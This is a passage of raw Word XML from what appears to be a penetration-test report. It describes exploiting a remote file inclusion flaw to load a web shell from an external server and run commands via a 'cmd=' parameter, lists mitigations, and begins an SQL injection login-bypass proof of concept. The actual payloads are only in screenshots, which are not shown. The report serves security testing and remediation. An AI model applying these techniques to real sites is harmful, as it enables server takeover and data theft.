        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>We'll try to change the parameter and see if we get any results. By entering Google's address we'll receive the current result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BABECD" w14:textId="206CD948" w:rsidR="007D45E2" w:rsidRPr="00827178" w:rsidRDefault="00CA51D7" w:rsidP="007D45E2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD8734E" wp14:editId="5384ABB1">
            <wp:extent cx="5844540" cy="2226365"/>
            <wp:effectExtent l="0" t="0" r="381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095" cy="2252480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61838231" w14:textId="60D93F80" w:rsidR="00827178" w:rsidRDefault="00CA51D7" w:rsidP="00827178">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4597716E" wp14:editId="30A9100B">
            <wp:extent cx="5274310" cy="242824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28240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965F29C" w14:textId="498091DE" w:rsidR="00CA51D7" w:rsidRDefault="00CA51D7" w:rsidP="00CA51D7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can see some warnings in our response, yet, seems like the implementation of an external website works great, and so it is vulnerable for different sources as well. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6468DFA4" w14:textId="48C0621A" w:rsidR="00CA51D7" w:rsidRDefault="00CA51D7" w:rsidP="00CA51D7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>We'll now use this vulnerability in order to open a web shell we have on our external server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5819C02A" w14:textId="77777777" w:rsidR="00CA51D7" w:rsidRDefault="00CA51D7" w:rsidP="00CA51D7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17805E4F" w14:textId="4FEE33C3" w:rsidR="00CA51D7" w:rsidRDefault="00CA51D7" w:rsidP="00CA51D7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B91ED23" wp14:editId="6E00F432">
            <wp:extent cx="5943486" cy="2003729"/>
            <wp:effectExtent l="0" t="0" r="63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045" cy="2069995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00449723" w14:textId="6F9B1801" w:rsidR="00CA51D7" w:rsidRDefault="00CA51D7" w:rsidP="00CA51D7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77FF7BE1" wp14:editId="3BDEDB98">
            <wp:extent cx="5274310" cy="1633220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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33220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF4CAA3" w14:textId="2026C1FD" w:rsidR="00CA51D7" w:rsidRDefault="00CA51D7" w:rsidP="00CA51D7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>We executed the malicious file on our external server successfully and now implemented our CMD script on the website. We'll use the URL in order to run commands on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ECDB0F" w14:textId="240E4458" w:rsidR="00CA51D7" w:rsidRDefault="00CA51D7" w:rsidP="00CA51D7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56E34D1E" wp14:editId="148F0DBB">
            <wp:extent cx="6530340" cy="3717647"/>
            <wp:effectExtent l="0" t="0" r="381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6410" cy="3755260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5260B32B" w14:textId="5F8C120A" w:rsidR="00CA51D7" w:rsidRPr="00CA51D7" w:rsidRDefault="00CA51D7" w:rsidP="00CA51D7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As we can see, we can run any command we want using that new </w:t>
      </w:r>
      <w:r w:rsidR="00666505">
        <w:t>interface we implemented. By running '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00666505">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00666505">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00666505">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00666505">
        <w:t xml:space="preserve">', for example, we'll get </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00666505">
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidR="00935F3B">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00666505">
        <w:t xml:space="preserve"> the folders that are located on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746D561" w14:textId="6E084160" w:rsidR="00827178" w:rsidRDefault="007F528B" w:rsidP="007F528B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Business impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0F3A4" w14:textId="26BC40BE" w:rsidR="007F528B" w:rsidRDefault="007F528B" w:rsidP="007F528B">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>An RFI vulnerability such as the one we located might be the source of all sorts of exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A6EAF4" w14:textId="68907BC3" w:rsidR="007F528B" w:rsidRP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information theft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F05B5F" w14:textId="77777777" w:rsidR="007F528B" w:rsidRP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 xml:space="preserve"> compromised servers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A580D05" w14:textId="1F0C8022" w:rsidR="007F528B" w:rsidRDefault="007F528B" w:rsidP="007F528B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F528B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> site takeover that allows for content modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B34531C" w14:textId="7D83A676" w:rsidR="007F528B" w:rsidRDefault="00EE12A0" w:rsidP="007F528B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="007F528B">
        <w:t>itigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C6CCA" w14:textId="76DB0415" w:rsidR="00EE12A0" w:rsidRPr="00B643E5" w:rsidRDefault="00B643E5" w:rsidP="00C63F54">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63F54">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>proper input validation and sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343F1D2C" w14:textId="4543D491" w:rsidR="00B643E5" w:rsidRDefault="00B643E5" w:rsidP="00C63F54">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63F54">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>output validation mechanisms should be applied on the server end</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70000C" w14:textId="726206B1" w:rsidR="00B643E5" w:rsidRDefault="00B643E5" w:rsidP="00C63F54">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63F54">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>restricting execution permission for the upload directories</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A5D15F" w14:textId="6F2C2342" w:rsidR="00B643E5" w:rsidRDefault="00B643E5" w:rsidP="00C63F54">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63F54">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>maintain a whitelist of allowable parameter types</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EBBDFC" w14:textId="5ADA2502" w:rsidR="00B643E5" w:rsidRPr="00EE12A0" w:rsidRDefault="00B643E5" w:rsidP="00B643E5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Avoid using functions such as '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>include(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)'</w:t>
      </w:r>
      <w:r w:rsidR="00C63F54">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 'require()' as much as possible</w:t>
      </w:r>
      <w:r w:rsidR="002F422C">
        <w:t>, and if you do- never use them with the user's input without proper validation</w:t>
      </w:r>
      <w:r w:rsidR="007C22C9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC6337F" w14:textId="0D267443" w:rsidR="00707066" w:rsidRPr="00787602" w:rsidRDefault="00707066" w:rsidP="00827178">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00787602">
        <w:t>QL injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E613F30" w14:textId="55DAE295" w:rsidR="00707066" w:rsidRPr="00787602" w:rsidRDefault="00707066" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C9D94" w14:textId="13ABD424" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00707066" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection is a code injection technique for bypassing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>authentication, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tempering with database structure or with the data that is stored inside. One of the most common attacks on web applications</w:t>
      </w:r>
      <w:r w:rsidR="00074A02" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23625A13" w14:textId="41F62FBC" w:rsidR="00074A02" w:rsidRPr="00787602" w:rsidRDefault="00707066" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:szCs w:val="26"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CB1C71" w14:textId="6276BA89" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00296EF2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As a malicious user we would like to try and login to the web application, the optimal result for us would be to log in as an administrator.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0893AEFD" w14:textId="77777777" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15530D59" w14:textId="7673728B" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00296EF2" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45FE2D3D" wp14:editId="5681398D">
            <wp:extent cx="5274310" cy="308102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81020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1246D691" w14:textId="3D52B30C" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E0F8B8" w14:textId="59F35401" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C75D2C2" w14:textId="0854AA85" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E379005" w14:textId="31B29E76" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DEF1D9" w14:textId="30F0CEFA" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214108B1" w14:textId="1C922427" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D81B261" w14:textId="63A4EE48" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B21C86" w14:textId="30B281C7" w:rsidR="00AB506A" w:rsidRPr="00F94EEA" w:rsidRDefault="00AB506A" w:rsidP="00296EF2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We will try to get some errors by typing random usernames and passwords to get the database to respond with something useful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B466DE1" w14:textId="125BA97D" w:rsidR="00AB506A" w:rsidRPr="00F94EEA" w:rsidRDefault="00296EF2" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17FE41A1" wp14:editId="52A67CAA">
            <wp:extent cx="5856605" cy="7810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543" cy="789977"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00AB506A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6181D229" wp14:editId="011E957B">
            <wp:extent cx="3038475" cy="274609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48" cy="2754835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33843A6C" w14:textId="77777777" w:rsidR="00AB506A" w:rsidRPr="00F94EEA" w:rsidRDefault="00AB506A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79070163" w14:textId="4B296B76" w:rsidR="00AB506A" w:rsidRPr="00F94EEA" w:rsidRDefault="00AB506A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49561F17" w14:textId="0F0C623D" w:rsidR="00074A02" w:rsidRPr="00F94EEA" w:rsidRDefault="00074A02" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2927B00A" w14:textId="1FA080EF" w:rsidR="004E1949" w:rsidRDefault="004E1949" w:rsidP="00296EF2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Then</w:t>
      </w:r>
      <w:r w:rsidR="00AB506A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we will try to inject an "always true" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB506A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB506A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement to get access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. By doing that, we might be able to enter the system without </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>actually being</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a signed in the system's database.</w:t>
      </w:r>
      <w:r w:rsidR="00CD17CC">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CD0DF6" w14:textId="77777777" w:rsidR="004312B3" w:rsidRPr="00F94EEA" w:rsidRDefault="004312B3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA2776D" w14:textId="6B7F2318" w:rsidR="004312B3" w:rsidRDefault="004E1949" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28AB497E" wp14:editId="0DDE0688">
            <wp:extent cx="3661620" cy="31242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8" cy="3137466"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AE8AB4" w14:textId="77777777" w:rsidR="000C0EA2" w:rsidRDefault="000C0EA2" w:rsidP="000C0EA2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
